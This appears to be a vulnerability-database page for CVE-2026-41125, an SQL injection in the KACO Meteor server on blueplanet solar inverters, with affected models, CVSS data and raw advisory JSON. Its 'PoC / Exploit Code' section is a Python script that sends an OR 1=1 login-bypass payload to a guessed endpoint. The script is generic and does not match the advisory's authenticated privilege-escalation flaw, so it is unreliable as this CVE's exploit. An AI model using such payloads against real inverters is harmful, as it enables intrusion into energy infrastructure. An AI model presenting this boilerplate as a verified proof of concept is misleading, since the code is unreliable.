Security Vulnerability Report
中文
CVE-2026-41125 CVSS 6.0 MEDIUM

CVE-2026-41125

Published: 2026-05-12 10:16:46
Last Modified: 2026-05-12 10:16:46

Description

A vulnerability has been identified in blueplanet 100 NX3 M8 (All versions), blueplanet 100 TL3 GEN2 (All versions), blueplanet 105 TL3 (All versions), blueplanet 105 TL3 GEN2 (All versions), blueplanet 110 TL3 (All versions), blueplanet 125 NX3 M11 (All versions), blueplanet 125 TL3 (All versions), blueplanet 125 TL3 GEN2 (All versions), blueplanet 137 TL3 (All versions), blueplanet 150 TL3 (All versions), blueplanet 150 TL3 GEN2 (All versions), blueplanet 155 TL3 (All versions), blueplanet 155 TL3 GEN2 (All versions), blueplanet 165 TL3 (All versions), blueplanet 165 TL3 GEN2 (All versions), blueplanet 25.0 NX3-33.0 NX3 (All versions), blueplanet 3.0 NX3-20.0 NX3 (All versions), blueplanet 3.0-5.0 NX1 (All versions), blueplanet 360 NX3 M6 (All versions), blueplanet 50.0 NX3-60.0 NX3 (All versions), blueplanet 87.0 TL3 (All versions), blueplanet 87.0 TL3 GEN2 (All versions), blueplanet 92.0 TL3 (All versions), blueplanet 92.0 TL3 GEN2 (All versions), blueplanet gridsafe 110 TL3-S (All versions), blueplanet gridsafe 137 TL3-S (All versions), blueplanet gridsafe 92.0 TL3-S (All versions), blueplanet hybrid 10.0 TL3 (All versions), blueplanet hybrid 6.0 NH3-12.0 NH3 (All versions). Improper neutralization of special elements used in an sql command ('sql injection') in KACO Meteor server allows an authorized attacker to elevate privileges over a local network.

CVSS Details

CVSS Score
6.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:H

Configurations (Affected Products)

No configuration data available.

blueplanet 100 NX3 M8 (所有版本)
blueplanet 100 TL3 GEN2 (所有版本)
blueplanet 105 TL3 (所有版本)
blueplanet 105 TL3 GEN2 (所有版本)
blueplanet 110 TL3 (所有版本)
blueplanet 125 NX3 M11 (所有版本)
blueplanet 125 TL3 (所有版本)
blueplanet 125 TL3 GEN2 (所有版本)
blueplanet 137 TL3 (所有版本)
blueplanet 150 TL3 (所有版本)
blueplanet 150 TL3 GEN2 (所有版本)
blueplanet 155 TL3 (所有版本)
blueplanet 155 TL3 GEN2 (所有版本)
blueplanet 165 TL3 (所有版本)
blueplanet 165 TL3 GEN2 (所有版本)
blueplanet 25.0 NX3-33.0 NX3 (所有版本)
blueplanet 3.0 NX3-20.0 NX3 (所有版本)
blueplanet 3.0-5.0 NX1 (所有版本)
blueplanet 360 NX3 M6 (所有版本)
blueplanet 50.0 NX3-60.0 NX3 (所有版本)
blueplanet 87.0 TL3 (所有版本)
blueplanet 87.0 TL3 GEN2 (所有版本)
blueplanet 92.0 TL3 (所有版本)
blueplanet 92.0 TL3 GEN2 (所有版本)
blueplanet gridsafe 110 TL3-S (所有版本)
blueplanet gridsafe 137 TL3-S (所有版本)
blueplanet gridsafe 92.0 TL3-S (所有版本)
blueplanet hybrid 10.0 TL3 (所有版本)
blueplanet hybrid 6.0 NH3-12.0 NH3 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-41125 PoC Example (Generic SQL Injection) # Target: KACO Meteor Server # The vulnerability allows an authenticated attacker to elevate privileges via SQL injection. target_ip = "192.168.1.100" # Replace with actual target IP login_url = f"http://{target_ip}/api/login" # Example endpoint # Malicious payload to bypass authentication or escalate privileges # Example payload: ' OR '1'='1' -- # Note: The exact payload depends on the vulnerable query structure. payload = { "username": "admin' OR 1=1 --", "password": "random" } headers = { "User-Agent": "CVE-2026-41125-Scanner", "Content-Type": "application/x-www-form-urlencoded" } try: print(f"[*] Sending payload to {target_ip}...") response = requests.post(login_url, data=payload, headers=headers, timeout=10) if response.status_code == 200: # Check for indicators of successful login or admin access if "Welcome" in response.text or "dashboard" in response.text.lower(): print("[+] Exploit successful! Privilege escalation possible.") print("[+] Response:", response.text[:200]) else: print("[-] Payload sent, but exploitation failed or not vulnerable.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41125", "sourceIdentifier": "[email protected]", "published": "2026-05-12T10:16:46.057", "lastModified": "2026-05-12T10:16:46.057", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in blueplanet 100 NX3 M8 (All versions), blueplanet 100 TL3 GEN2 (All versions), blueplanet 105 TL3 (All versions), blueplanet 105 TL3 GEN2 (All versions), blueplanet 110 TL3 (All versions), blueplanet 125 NX3 M11 (All versions), blueplanet 125 TL3 (All versions), blueplanet 125 TL3 GEN2 (All versions), blueplanet 137 TL3 (All versions), blueplanet 150 TL3 (All versions), blueplanet 150 TL3 GEN2 (All versions), blueplanet 155 TL3 (All versions), blueplanet 155 TL3 GEN2 (All versions), blueplanet 165 TL3 (All versions), blueplanet 165 TL3 GEN2 (All versions), blueplanet 25.0 NX3-33.0 NX3 (All versions), blueplanet 3.0 NX3-20.0 NX3 (All versions), blueplanet 3.0-5.0 NX1 (All versions), blueplanet 360 NX3 M6 (All versions), blueplanet 50.0 NX3-60.0 NX3 (All versions), blueplanet 87.0 TL3 (All versions), blueplanet 87.0 TL3 GEN2 (All versions), blueplanet 92.0 TL3 (All versions), blueplanet 92.0 TL3 GEN2 (All versions), blueplanet gridsafe 110 TL3-S (All versions), blueplanet gridsafe 137 TL3-S (All versions), blueplanet gridsafe 92.0 TL3-S (All versions), blueplanet hybrid 10.0 TL3 (All versions), blueplanet hybrid 6.0 NH3-12.0 NH3 (All versions). Improper neutralization of special elements used in an sql command ('sql injection') in KACO Meteor server allows an authorized attacker to elevate privileges over a local network."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:N/PR:H/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:H", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-545643.html", "source": "[email protected]"}]}}